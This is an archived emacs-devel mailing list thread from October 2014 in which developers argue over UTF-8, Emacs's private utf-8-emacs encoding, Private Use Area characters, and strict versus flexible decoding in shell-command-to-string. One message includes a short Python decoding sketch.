> that's what it is there for!)

utf-8-emacs is a private encoding used and understood by Emacs alone,
so encoding Emacs files in that would make them unusable
(unsearchable, unreadable, etc.) with anything but Emacs.

As for using PUA, you have been told just a few days ago why this is
not going to work with Emacs.

> The metadata (language, for which original coded character set is a
> proxy) can be provided either with a markup language (eg, XML or even
> HTML) or using Plane 14 tags (but I wrote that already).

It is easy to suggest such major endeavors to other projects in which
you have no intention to become involved.  From the Emacs side, this
would be a terrible waste of resources, since the "problem" is already
solved in Emacs by other means, which work well, based on several
years of real-life experience.

>  > if you had, you would not be asserting so blithely that there is
>  > "no barrier" to converting all Emacs source files to UTF-8.
> 
> I stand corrected.  No *technical* barrier.  It does require
> nontrivial work: simply filtering through iconv is not enough.
> 
> There's also a political barrier: I believe that characters are
> characters, and may be shared across traditional character set
> boundaries, and that the presentation layer should specify
> presentation.  Dr. Handa prefers that presentation be encoded in the
> content.  I have no stomach for that argument.

The statement that UTF-8 is a de-facto Emacs "locale" still stands.
And so having Emacs behave in a way that makes it easy to work with
these files, including those few that for various reasons are encoded
differently, is still a valuable feature.  Your argument that Emacs
files have no single encoding and therefore there's no reasonable way
to support them is struck down.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15  9:20                                                                                         ` Eli Zaretskii
@ 2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
  2014-10-15 11:57                                                                                             ` David Kastrup
  2014-10-15 12:32                                                                                             ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 11:34 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: eggert, emacs-devel

Eli Zaretskii writes:

 > utf-8-emacs is a private encoding used and understood by Emacs
 > alone, so encoding Emacs files in that would make them unusable
 > (unsearchable, unreadable, etc.) with anything but Emacs.

And who in the world would care?  They're *all* Emacs Lisp source
code, not even documentation.  They're all in languages whose scripts
are in Unicode.  So most of the characters will be ASCII, most of the
rest will be in Unicode, and the few that aren't, you can probably
forget about reading or writing in any environment but Emacs or an
extremely idiosyncratic one that isn't good for anything except
reading and writing old Tibetan or Sanskrit encodings (but not both).

 > As for using PUA, you have been told just a few days ago why this is
 > not going to work with Emacs.

That is a bet I will eventually take you up on.  It may not be going
to work in Emacs, ever, but I bet I can make it work in XEmacs. :-)

 > Your argument that Emacs files have no single encoding and
 > therefore there's no reasonable way to support them is struck down.

I never made such an argument.  My argument is that Emacs is alone in
choosing this particular "reasonable way to support encodings", and
that makes it difficult to cooperate with other projects ... such as
Guile.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
@ 2014-10-15 11:57                                                                                             ` David Kastrup
  2014-10-15 12:32                                                                                             ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-15 11:57 UTC (permalink / raw)
  To: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> I never made such an argument.  My argument is that Emacs is alone in
> choosing this particular "reasonable way to support encodings", and
> that makes it difficult to cooperate with other projects ... such as
> Guile.

"cooperate with" and "meld with" tend to raise substantially different
issues.  Emacs is perfectly well equipped to cooperate with a lot of
other projects not least of all because of its unusually diverse support
of encodings.  But of course it is a perfect nightmare to reimplement
Emacs on the basis of a system with a less polymorphic history.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
  2014-10-15 11:57                                                                                             ` David Kastrup
@ 2014-10-15 12:32                                                                                             ` Eli Zaretskii
  2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15 12:32 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: eggert, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: eggert@cs.ucla.edu,
>     emacs-devel@gnu.org
> Date: Wed, 15 Oct 2014 20:34:31 +0900
> 
> Eli Zaretskii writes:
> 
>  > utf-8-emacs is a private encoding used and understood by Emacs
>  > alone, so encoding Emacs files in that would make them unusable
>  > (unsearchable, unreadable, etc.) with anything but Emacs.
> 
> And who in the world would care?

Those who use Grep etc. outside of Emacs.

> My argument is that Emacs is alone in choosing this particular
> "reasonable way to support encodings"

What other programs are you aware of that cover such a large set of
scripts and languages no matter what is the user locale?

> and that makes it difficult to cooperate with other projects
> ... such as Guile.

My point is that those other projects need to learn from Emacs first.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-14  6:24                                                                       ` Eli Zaretskii
  2014-10-14  7:48                                                                         ` David Kastrup
@ 2014-10-15 13:16                                                                         ` Richard Stallman
  2014-10-15 14:32                                                                           ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-15 13:16 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    I believe the commands that use shell-command-to-string are a good
    example of these cases.  That function is frequently used as
    infrastructure to query an external program about something, and the
    result is then used, at least in some cases, to decide how to proceed.

1. The scenario we've been told about is where the invalid UTF-8 gets
passed on to some other program.  I don't think any harm will come if
Emacs itself looks at the output of the command.  Emacs does not
generally get confused by raw bytes.

2. It would not be hard to make another function (which does strict
decoding) to recommend instead of shell-command-to-string for use in
Lisp code in certain cases.

3. It would be easy enough to make shell-command-to-string do flexible
decoding when called interactively and do strict decoding when called
noninteractively -- controlled through an optional argument.
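
The strict/flexible distinction in points 2 and 3 can be sketched in
Python as an analogy.  This is not Emacs code, and the function name and
"strict" parameter are hypothetical.  Python's "surrogateescape" error
handler stands in here for Emacs's raw-byte handling: invalid bytes are
kept and can be written back out unchanged, whereas strict decoding
rejects them.

```python
def decode_command_output(raw: bytes, strict: bool = False) -> str:
    """Decode command output as UTF-8.

    With strict=True, invalid UTF-8 raises UnicodeDecodeError.
    With strict=False, invalid bytes are preserved as lone surrogates
    so the original bytes can be recovered later.
    """
    errors = "strict" if strict else "surrogateescape"
    return raw.decode("utf-8", errors=errors)


raw = b"ok \xff\n"  # 0xFF can never appear in valid UTF-8

flexible = decode_command_output(raw)
round_tripped = flexible.encode("utf-8", errors="surrogateescape")

try:
    decode_command_output(raw, strict=True)
    strict_rejected = False
except UnicodeDecodeError:
    strict_rejected = True

print(round_tripped == raw, strict_rejected)
```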

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 12:32                                                                                             ` Eli Zaretskii
@ 2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
  2014-10-15 14:36                                                                                                 ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 13:22 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: eggert, emacs-devel

Eli Zaretskii writes:

 > >  > utf-8-emacs is a private encoding used and understood by Emacs
 > >  > alone, so encoding Emacs files in that would make them unusable
 > >  > (unsearchable, unreadable, etc.) with anything but Emacs.
 > > 
 > > And who in the world would care?
 > 
 > Those who use Grep etc. outside of Emacs.

Well, no, because only those with a very special and very obsolete
environment would be able to search for those few characters using
grep, if they don't have Emacs.  The rest of the characters are in
Unicode, so can be searched as usual using the UTF-8 representation.

 > > My argument is that Emacs is alone in choosing this particular
 > > "reasonable way to support encodings"
 > 
 > What other programs are you aware of that cover such a large set of
 > scripts and languages no matter what is the user locale?

With Unicode support, *all of them*.  (Note: I didn't change from
encodings to "scripts and languages", you did.)

Of course, very few handle all of the *character encodings* that Emacs
does, but iconv and recode come close, or perhaps even exceed Emacs in
some areas.  Those programs, plus a little shell (oops, you're on
Windows, OK, *Python*), and you can do 99.44% of what Emacs can do as
far as handling file coding.

True, Emacs is a little more convenient in handling file coding, but
the majority of folks evidently think that is far outweighed by the
inconvenience of Emacs itself.

 > My point is that those other projects need to learn from Emacs first.

Could be you're right, but sadly, I doubt anyone is going to bother.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-15 13:16                                                                         ` Richard Stallman
@ 2014-10-15 14:32                                                                           ` Eli Zaretskii
  2014-10-15 14:43                                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15 14:32 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Wed, 15 Oct 2014 09:16:20 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
>     I believe the commands that use shell-command-to-string are a good
>     example of these cases.  That function is frequently used as
>     infrastructure to query an external program about something, and the
>     result is then used, at least in some cases, to decide how to proceed.
> 
> 1. The scenario we've been told about is where the invalid UTF-8 gets
> passed on to some other program.  I don't think any harm will come if
> Emacs itself looks at the output of the command.  Emacs does not
> generally get confused by raw bytes.

What Emacs gets from a program it can as easily send to another (or
the same one).

> 2. It would not be hard to make another function (which does strict
> decoding) to recommend instead of shell-command-to-string for use in
> Lisp code in certain cases.
> 
> 3. It would be easy enough to make shell-command-to-string do flexible
> decoding when called interactively and do strict decoding when called
> noninteractively -- controlled through an optional argument.

I envision complaints from users if we do that.




* Re: Emacs Lisp's future
  2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
@ 2014-10-15 14:36                                                                                                 ` Eli Zaretskii
  2014-10-15 14:51                                                                                                   ` David Kastrup
  2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-15 14:36 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: eggert, emacs-devel

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: eggert@cs.ucla.edu,
>     emacs-devel@gnu.org
> Date: Wed, 15 Oct 2014 22:22:26 +0900
> 
> Eli Zaretskii writes:
> 
>  > >  > utf-8-emacs is a private encoding used and understood by Emacs
>  > >  > alone, so encoding Emacs files in that would make them unusable
>  > >  > (unsearchable, unreadable, etc.) with anything but Emacs.
>  > > 
>  > > And who in the world would care?
>  > 
>  > Those who use Grep etc. outside of Emacs.
> 
> Well, no, because only those with a very special and very obsolete
> environment would be able to search for those few characters using
> grep, if they don't have Emacs.  The rest of the characters are in
> Unicode, so can be searched as usual using the UTF-8 representation.

You assume that Grep and the terminal will not choke on the
non-Unicode characters.  There's no basis for such an assumption.

>  > > My argument is that Emacs is alone in choosing this particular
>  > > "reasonable way to support encodings"
>  > 
>  > What other programs are you aware of that cover such a large set of
>  > scripts and languages, whatever the user's locale?
> 
> With Unicode support, *all of them*.

Treating UTF-8 as a byte stream doesn't constitute "support".

>  > My point is that those other projects need to learn from Emacs first.
> 
> Could be you're right, but sadly, I doubt anyone is going to bother.

Too bad.




* Re: Emacs Lisp's future
  2014-10-15 14:32                                                                           ` Eli Zaretskii
@ 2014-10-15 14:43                                                                             ` David Kastrup
  2014-10-16 18:12                                                                               ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-15 14:43 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Wed, 15 Oct 2014 09:16:20 -0400
>> From: Richard Stallman <rms@gnu.org>
>> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
>> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
>> 	monnier@iro.umontreal.ca, stephen@xemacs.org
>> 
>>     I believe the commands that use shell-command-to-string are a good
>>     example of these cases.  That function is frequently used as
>>     infrastructure to query an external program about something, and the
>>     result is then used, at least in some cases, to decide how to proceed.
>> 
>> 1. The scenario we've been told about is where the invalid UTF-8 gets
>> passed on to some other program.  I don't think any harm will come if
>> Emacs itself looks at the output of the command.  Emacs does not
>> generally get confused by raw bytes.
>
> What Emacs gets from a program it can as easily send to another (or
> the same one).
>
>> 2. It would not be hard to make another function (which does strict
>> decoding) to recommend instead of shell-command-to-string for use in
>> Lisp code in certain cases.
>> 
>> 3. It would be easy enough to make shell-command-to-string do flexible
>> decoding when called interactively and do strict decoding when called
>> noninteractively -- controlled through an optional argument.
>
> I envision complaints from users if we do that.

Sounds like a recipe for a non-debuggable security nightmare.  Tampering
with content that Emacs does not know the meaning of, and doing so
differently in non-interactive use is a recipe for making Emacs do
unexpected things.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-15 14:36                                                                                                 ` Eli Zaretskii
@ 2014-10-15 14:51                                                                                                   ` David Kastrup
  2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-15 14:51 UTC (permalink / raw)
  To: emacs-devel

Eli Zaretskii <eliz@gnu.org> writes:

>> From: "Stephen J. Turnbull" <stephen@xemacs.org>
>> Eli Zaretskii writes:
>
>>  > My point is that those other projects need to learn from Emacs first.
>> 
>> Could be you're right, but sadly, I doubt anyone is going to bother.
>
> Too bad.

With regard to GUILE, not learning from Emacs before taking over its
multilingual support is not really much of an option.  I rather doubt
that the current "fair is foul, and foul is fair" chants will be
sufficient for convincing existing users to abandon the evil encodings
they have been comfortable dabbling in so far due to the forbidden arts
of Emacs.

"Be thankful you can no longer avail yourself of this tool for this
purpose" works better in religious settings.

-- 
David Kastrup





* Re: Emacs Lisp's future
  2014-10-15 14:36                                                                                                 ` Eli Zaretskii
  2014-10-15 14:51                                                                                                   ` David Kastrup
@ 2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
  1 sibling, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 16:57 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: eggert, emacs-devel

Eli Zaretskii writes:

 > You assume that Grep and the terminal will not choke on the
 > non-Unicode characters.  There's no basis for such an assumption.

No basis at all.  But that's not what I'm assuming.  Just like you
(and Emacs itself, which already has several files containing such
non-Unicode characters), I'm simply assuming that GIGO will cause no
harm.

The difference is that in the longer run I plan to remove the problem
by using the PUA, which you say can't be done in Emacs.




* Re: Emacs Lisp's future
  2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
  2014-10-15  9:20                                                                                         ` Eli Zaretskii
@ 2014-10-15 17:18                                                                                         ` Paul Eggert
  2014-10-15 18:39                                                                                           ` Stephen J. Turnbull
  1 sibling, 1 reply; 261+ messages in thread
From: Paul Eggert @ 2014-10-15 17:18 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: Eli Zaretskii, emacs-devel

On 10/15/2014 12:17 AM, Stephen J. Turnbull wrote:
>   > It's perfectly fine for users to try "M-x grep -r" at home.  It's
>   > not going to hurt them.
>
> That's true for "hurt" == "must call 911".
It's not going to trash their files, or corrupt their displays, or steal 
their passwords, or do anything that's going to hurt them.  Let's not be 
fearmongers here.  The current behavior is useful and easy to explain 
and understand, and people use it a lot, and in that sense it is not a 
"bug".  Although the behavior could be changed to better handle the use 
cases you're thinking about, that is a different matter, one that would 
require nontrivial work to do, and one that shouldn't obstruct the 
common current usage.

>
>  > Conversely, it appears that you did not read the file
>  > admin/notes/unicode carefully;
>
> "It appears that you have not studied Unicode carefully", as there is
> nothing in that file that suggests anything but work is involved

Nontrivial work needs to be done, and this is a technical barrier as 
nobody (including you) has had the time to do the work.  It does still 
appear, though, that you haven't read admin/notes/unicode carefully 
enough, as a simple language-tag-per-file approach won't suffice for 
src/msdos.c, etc/HELLO, lisp/language/tibetan.el, etc., and still more 
work would need to be done for those files, the details of which have 
never (as far as I know) been discussed.  It's not clear how my studying 
Unicode more carefully would help in that effort.




* Re: Emacs Lisp's future
  2014-10-15 17:18                                                                                         ` Paul Eggert
@ 2014-10-15 18:39                                                                                           ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-15 18:39 UTC (permalink / raw)
  To: Paul Eggert; +Cc: Eli Zaretskii, emacs-devel

Paul Eggert writes:

 > The current behavior is useful and easy to explain and understand,
 > and people use it a lot,

Granted.

 > and in that sense it is not a "bug".

I give up.  I can't imagine successfully communicating with someone
who defines "not a bug" that way.







* Re: Emacs Lisp's future
  2014-10-15 14:43                                                                             ` David Kastrup
@ 2014-10-16 18:12                                                                               ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-16 18:12 UTC (permalink / raw)
  To: David Kastrup
  Cc: mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, eliz,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

I presented three solutions for handling shell-command-to-string, but
I was confusing it with another function which is a command.
shell-command-to-string is only used in Lisp programs, and probably
those programs will not show that text to a user except in error messages.

Perhaps it should always do strict decoding.

Can you present a real example of using shell-command-to-string
that really needs to do flexible decoding?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





end of thread, other threads:[~2014-10-16 18:12 UTC | newest]

Thread overview: 261+ messages
2014-09-17  7:38 Emacs Lisp's future (was: Guile emacs thread (again)) Kristian Nygaard Jensen
2014-09-17 15:15 ` Emacs Lisp's future Stefan Monnier
2014-09-17 16:15   ` James Cloos
2014-09-17 17:53     ` Stefan Monnier
2014-09-17 21:46       ` Stefan Monnier
2014-09-18  1:09         ` James Cloos
2014-09-18  7:12         ` Helmut Eller
2014-09-18  7:46         ` Thorsten Jolitz
2014-09-18 18:59       ` Johan Bockgård
2014-09-18 21:01       ` Sam Steingold
2014-09-19  0:56         ` Stefan Monnier
2014-09-19 12:24           ` Sam Steingold
2014-09-26 13:43 ` Robin Templeton
2014-09-26 14:15   ` David Kastrup
2014-09-26 14:45     ` Dmitry Antipov
2014-09-26 15:05       ` David Kastrup
2014-09-27  8:44         ` Stephen J. Turnbull
2014-09-27  8:59           ` David Kastrup
2014-09-27 15:30             ` Stephen J. Turnbull
2014-09-26 15:07       ` Eli Zaretskii
2014-09-26 15:21         ` David Kastrup
2014-09-27  8:35         ` Stephen J. Turnbull
2014-09-27  8:49           ` David Kastrup
2014-09-27  9:32           ` Eli Zaretskii
2014-09-27 10:37             ` Stephen J. Turnbull
2014-09-27 11:13               ` David Kastrup
2014-09-27 12:00                 ` Eli Zaretskii
2014-09-27 14:04                   ` Stefan Monnier
2014-09-27 14:24                     ` David Kastrup
2014-09-27 15:24                       ` Stefan Monnier
2014-09-27 15:41                         ` David Kastrup
2014-09-27 15:57                           ` Stefan Monnier
2014-09-27 16:25                             ` David Kastrup
2014-09-27 17:23                               ` Stefan Monnier
2014-09-28 23:22                                 ` Richard Stallman
2014-09-29  1:33                                   ` Stefan Monnier
2014-09-29 20:48                                     ` Richard Stallman
2014-10-05  7:53                                   ` Mark H Weaver
2014-10-05  9:01                                     ` David Kastrup
2014-10-05 10:43                                     ` Stephen J. Turnbull
2014-10-05 11:10                                       ` David Kastrup
2014-10-05 11:56                                         ` Stephen J. Turnbull
2014-10-05 14:30                                       ` Mark H Weaver
2014-10-05 15:48                                         ` Stephen J. Turnbull
2014-10-05 18:29                                           ` Mark H Weaver
2014-10-05 21:49                                     ` Richard Stallman
     [not found]                                       ` <"<83lhotme1e.fsf"@gnu.org>
2014-10-06  3:18                                       ` Stephen J. Turnbull
2014-10-06 19:15                                         ` Richard Stallman
2014-10-07  0:46                                           ` Stephen J. Turnbull
2014-10-07 14:04                                             ` Richard Stallman
2014-10-07 15:43                                               ` Stephen J. Turnbull
2014-10-07 16:01                                                 ` David Kastrup
2014-10-07 18:15                                                   ` Stephen J. Turnbull
2014-10-07 16:16                                                 ` David Kastrup
2014-10-10 10:09                                           ` Thien-Thi Nguyen
2014-10-06  6:21                                       ` Mark H Weaver
2014-10-06 15:08                                         ` Eli Zaretskii
2014-10-06 15:33                                           ` David Kastrup
2014-10-06 16:24                                             ` Eli Zaretskii
2014-10-06 16:40                                               ` David Kastrup
2014-10-06 17:04                                               ` Stephen J. Turnbull
2014-10-06 17:34                                                 ` David Kastrup
2014-10-07  0:33                                                   ` Stephen J. Turnbull
2014-10-07 14:03                                                 ` Richard Stallman
2014-10-07 14:37                                                   ` Eli Zaretskii
2014-10-06 16:27                                           ` Mark H Weaver
2014-10-06 16:47                                             ` Eli Zaretskii
2014-10-06 17:31                                               ` David Kastrup
2014-10-06 17:58                                                 ` David Kastrup
2014-10-07  2:35                                                   ` Eli Zaretskii
2014-10-06 17:43                                               ` Stephen J. Turnbull
2014-10-06 17:53                                                 ` David Kastrup
2014-10-07  0:35                                                   ` Stephen J. Turnbull
2014-10-07 14:03                                                 ` Richard Stallman
2014-10-07 14:21                                                   ` David Kastrup
2014-10-07 15:16                                                     ` Andreas Schwab
2014-10-07 15:33                                                       ` David Kastrup
2014-10-07 15:42                                                         ` Andreas Schwab
2014-10-07 16:03                                                           ` David Kastrup
2014-10-07 16:16                                                             ` Andreas Schwab
2014-10-07 16:24                                                               ` David Kastrup
2014-10-07 16:31                                                                 ` Andreas Schwab
2014-10-07 16:52                                                                   ` David Kastrup
2014-10-07 17:38                                                                     ` Andreas Schwab
2014-10-08  0:47                                                                     ` Richard Stallman
2014-10-08  7:19                                                                       ` Eli Zaretskii
2014-10-08  7:37                                                                         ` David Kastrup
2014-10-06 18:04                                               ` Stefan Monnier
2014-10-06 23:00                                                 ` Mark H Weaver
2014-10-07  1:04                                                   ` Stefan Monnier
2014-10-07 14:03                                                 ` Richard Stallman
2014-10-07 14:04                                               ` Richard Stallman
2014-10-07 14:14                                                 ` David Kastrup
     [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
2014-10-07 15:15                                                   ` Mark H Weaver
2014-10-07 15:31                                                     ` Andreas Schwab
2014-10-07 15:40                                                       ` David Kastrup
2014-10-07 18:32                                                         ` Stephen J. Turnbull
2014-10-07 18:41                                                           ` David Kastrup
2014-10-07 16:34                                                       ` Mark H Weaver
2014-10-07 17:50                                                         ` David Kastrup
2014-10-07 18:36                                                           ` Mark H Weaver
2014-10-07 18:56                                                             ` David Kastrup
2014-10-07 19:21                                                               ` Stephen J. Turnbull
2014-10-07 23:11                                                               ` Mark H Weaver
2014-10-08  3:03                                                                 ` David Kastrup
2014-10-08 15:03                                                                   ` Mark H Weaver
2014-10-08 15:11                                                                     ` Eli Zaretskii
2014-10-08 15:54                                                                     ` David Kastrup
2014-10-09  3:26                                                                       ` Stephen J. Turnbull
2014-10-09  4:14                                                                         ` David Kastrup
2014-10-09  7:31                                                                           ` Stephen J. Turnbull
2014-10-09  8:05                                                                             ` David Kastrup
2014-10-11 18:50                                                                 ` Florian Weimer
2014-10-07 16:59                                                     ` Eli Zaretskii
2014-10-08  0:47                                                   ` Richard Stallman
2014-10-08  7:13                                                     ` Eli Zaretskii
2014-10-09  1:19                                                       ` Richard Stallman
2014-10-09  7:21                                                         ` Eli Zaretskii
2014-10-09  7:52                                                           ` David Kastrup
2014-10-09  8:41                                                             ` Eli Zaretskii
2014-10-09  9:22                                                               ` David Kastrup
2014-10-13  3:04                                                                 ` Mark H Weaver
2014-10-13  7:41                                                                   ` David Kastrup
2014-10-10 14:24                                                           ` Richard Stallman
2014-10-10 15:28                                                             ` Eli Zaretskii
2014-10-11  1:15                                                               ` Richard Stallman
2014-10-11  7:18                                                                 ` David Kastrup
2014-10-12  3:22                                                                   ` Richard Stallman
2014-10-11  7:18                                                                 ` Eli Zaretskii
2014-10-11 23:51                                                                   ` Mark H Weaver
2014-10-12  1:35                                                                     ` Stephen J. Turnbull
2014-10-12  8:38                                                                       ` David Kastrup
2014-10-12 12:16                                                                         ` Stephen J. Turnbull
2014-10-12 12:34                                                                           ` David Kastrup
2014-10-12 14:49                                                                             ` Stephen J. Turnbull
2014-10-12 16:50                                                                               ` David Kastrup
2014-10-13  2:40                                                                                 ` Mark H Weaver
2014-10-13  4:49                                                                                   ` Mark H Weaver
2014-10-13  3:08                                                                               ` Richard Stallman
2014-10-13  4:50                                                                                 ` Stephen J. Turnbull
2014-10-13  3:41                                                                               ` Richard Stallman
2014-10-12  5:37                                                                     ` Eli Zaretskii
2014-10-12  3:24                                                                   ` Richard Stallman
2014-10-12  5:47                                                                     ` Eli Zaretskii
2014-10-13  3:07                                                                       ` Richard Stallman
2014-10-13  3:38                                                                       ` Richard Stallman
2014-10-10 14:24                                                           ` Richard Stallman
2014-10-10 15:38                                                             ` Eli Zaretskii
2014-10-11  1:17                                                               ` Richard Stallman
2014-10-11  7:23                                                                 ` David Kastrup
2014-10-11  7:33                                                                 ` Eli Zaretskii
2014-10-12  3:22                                                                   ` Richard Stallman
2014-10-12  5:22                                                                     ` David Kastrup
2014-10-13  3:09                                                                       ` Richard Stallman
2014-10-13  3:44                                                                       ` Richard Stallman
2014-10-13  7:59                                                                         ` David Kastrup
2014-10-13  8:32                                                                           ` Eli Zaretskii
2014-10-13  9:20                                                                             ` David Kastrup
2014-10-12  5:44                                                                     ` Eli Zaretskii
     [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
2014-10-10 16:02                                                               ` Drew Adams
2014-10-10 16:10                                                                 ` Eli Zaretskii
2014-10-09  7:36                                                     ` David Kastrup
2014-10-10 14:25                                                       ` Richard Stallman
2014-10-07 14:21                                                 ` Andreas Schwab
2014-10-06 19:17                                             ` Richard Stallman
2014-10-06 19:59                                               ` David Kastrup
2014-10-07  0:10                                               ` Mark H Weaver
2014-10-07 14:04                                                 ` Richard Stallman
2014-10-11 18:34                                         ` Florian Weimer
2014-10-05 21:49                                     ` Richard Stallman
2014-10-06  3:34                                       ` Stephen J. Turnbull
2014-10-08  0:48                                         ` Richard Stallman
2014-10-08  2:09                                           ` Stephen J. Turnbull
2014-10-08  3:07                                             ` David Kastrup
2014-10-09  3:06                                               ` Stephen J. Turnbull
2014-10-09  3:44                                                 ` David Kastrup
2014-10-09  7:16                                                   ` Stephen J. Turnbull
2014-10-09  7:47                                                     ` Eli Zaretskii
2014-10-09 10:20                                                       ` Stephen J. Turnbull
2014-10-10 14:23                                                 ` Richard Stallman
2014-10-09  1:19                                             ` Richard Stallman
2014-10-09  3:56                                               ` Stephen J. Turnbull
2014-10-09  4:49                                                 ` Mike Gerwitz
2014-10-09  8:00                                                   ` Eli Zaretskii
2014-10-09 10:50                                                     ` Stephen J. Turnbull
2014-10-09 11:06                                                       ` David Kastrup
2014-10-09 17:23                                                         ` Richard Stallman
2014-10-09 17:37                                                           ` Eli Zaretskii
2014-10-12  3:24                                                             ` Richard Stallman
2014-10-12  5:54                                                               ` Eli Zaretskii
2014-10-13  3:10                                                                 ` Richard Stallman
2014-10-13  5:35                                                                   ` Stephen J. Turnbull
2014-10-13  6:02                                                                     ` Eli Zaretskii
2014-10-13  8:24                                                                       ` Stephen J. Turnbull
2014-10-13  8:58                                                                         ` David Kastrup
2014-10-13  9:45                                                                           ` Stephen J. Turnbull
2014-10-13 10:17                                                                             ` Uwe Brauer
2014-10-13 10:30                                                                             ` David Kastrup
2014-10-13  9:05                                                                         ` Eli Zaretskii
2014-10-13 10:05                                                                           ` Stephen J. Turnbull
2014-10-13 14:55                                                                     ` Paul Eggert
2014-10-13 17:18                                                                       ` Stephen J. Turnbull
2014-10-13 17:24                                                                         ` David Kastrup
2014-10-13 17:49                                                                           ` Stephen J. Turnbull
2014-10-13 18:04                                                                             ` David Kastrup
2014-10-13 19:19                                                                             ` Eli Zaretskii
2014-10-14  7:03                                                                               ` Stephen J. Turnbull
2014-10-14  7:41                                                                                 ` Eli Zaretskii
2014-10-14  7:58                                                                                   ` Eli Zaretskii
2014-10-14 10:06                                                                                     ` Stephen J. Turnbull
2014-10-14  8:34                                                                                   ` Stephen J. Turnbull
2014-10-14  9:21                                                                                     ` Eli Zaretskii
2014-10-14 20:03                                                                                 ` Paul Eggert
2014-10-15  3:07                                                                                   ` Stephen J. Turnbull
2014-10-15  5:54                                                                                     ` Paul Eggert
2014-10-15  7:17                                                                                       ` Stephen J. Turnbull
2014-10-15  9:20                                                                                         ` Eli Zaretskii
2014-10-15 11:34                                                                                           ` Stephen J. Turnbull
2014-10-15 11:57                                                                                             ` David Kastrup
2014-10-15 12:32                                                                                             ` Eli Zaretskii
2014-10-15 13:22                                                                                               ` Stephen J. Turnbull
2014-10-15 14:36                                                                                                 ` Eli Zaretskii
2014-10-15 14:51                                                                                                   ` David Kastrup
2014-10-15 16:57                                                                                                   ` Stephen J. Turnbull
2014-10-15 17:18                                                                                         ` Paul Eggert
2014-10-15 18:39                                                                                           ` Stephen J. Turnbull
2014-10-14  2:11                                                                     ` Richard Stallman
2014-10-13  5:43                                                                   ` Eli Zaretskii
2014-10-14  2:09                                                                     ` Richard Stallman
2014-10-14  6:24                                                                       ` Eli Zaretskii
2014-10-14  7:48                                                                         ` David Kastrup
